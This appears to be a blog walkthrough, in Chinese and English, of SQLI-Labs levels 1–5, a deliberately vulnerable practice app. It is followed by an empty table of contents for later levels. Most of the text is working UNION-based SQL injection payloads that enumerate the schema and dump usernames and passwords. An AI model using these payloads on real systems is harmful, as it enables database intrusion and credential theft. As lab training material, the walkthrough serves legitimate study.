# SQLI-Labs

# less-1 GET - Error based - Single quotes - String (基于错误的 GET 单引号字符型注入)

字符型单引号闭合

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

#确定注入点
?id=1'
#字段
?id=-1' union select 1,2,3--+
#爆数据库
?id=-1' union select 1,database(),group_concat(schema_name) from information_schema.schemata--+
#爆tables
?id=-1' union select 1,database(),group_concat(table_name) from information_schema.columns where table_schema='security'--+
#爆columns
?id=-1' union select 1,database(),group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'--+
#id,username,password
?id=-1' union select 1,group_concat(username),group_concat(password) from security.users --+

# less-2 GET - Error based - Intiger based (基于错误的 GET 整型注入)

数字型

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";


#确定注入点
?id=1
#字段
?id=-1 union select 1,2,3--+
#爆数据库
?id=-1 union select 1,database(),group_concat(schema_name) from information_schema.schemata--+
#爆tables
?id=-1 union select 1,database(),group_concat(table_name) from information_schema.columns where table_schema='security'--+
#爆columns
?id=-1 union select 1,database(),group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'--+
#id,username,password
?id=-1 union select 1,group_concat(username),group_concat(password) from security.users --+

# less-3 GET - Error based - Single quotes with twist string (基于错误的 GET 单引号变形字符型注入)

$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
#闭合括号
?id=-1') union select 1,2,3 --+

# less-4 GET - Error based - Double Quotes - String （基于错误的 GET 双引号字符型注入）

$id=$GET['id'];
$id = '"' . $id . '"'
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
#闭合双引号括号
?id=-1") union select 1,2,3 --+

# less-5 GET - Double Injection - Single Quotes - String (双注入 GET 单引号字符型注入)

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
#正常单引号闭合字符型，但是不会显示信息，只有成功失败的不同

?id=-1' union select 1,2,3 --+
?id=1'and exists (select * from sysobjects)>0 --+
#Table 'security.sysobjects' doesn't exist
?id=1'and exists (select * from users)>0 --+

千里稻花应秀色

blogs by SSR

# SQLI-Labs

# less-1 GET - Error based - Single quotes - String (基于错误的 GET 单引号字符型注入)

# less-2 GET - Error based - Intiger based (基于错误的 GET 整型注入)

# less-3 GET - Error based - Single quotes with twist string (基于错误的 GET 单引号变形字符型注入)

# less-4 GET - Error based - Double Quotes - String （基于错误的 GET 双引号字符型注入）

# less-5 GET - Double Injection - Single Quotes - String (双注入 GET 单引号字符型注入)

# less-6

# less-7

# less-8

# less-9

# less-10

# less-11

# less-12

# less-13

# less-14

# less-15

# less-16

# less-17

# less-18

# less-19

# less-20

# less-21

# less-22

# less-23

# less-24

# less-25

# less-26

# less-27

# less-28

# less-29

# less-30

# less-31

# less-32

# less-33

# less-34

# less-35

# less-36

# less-37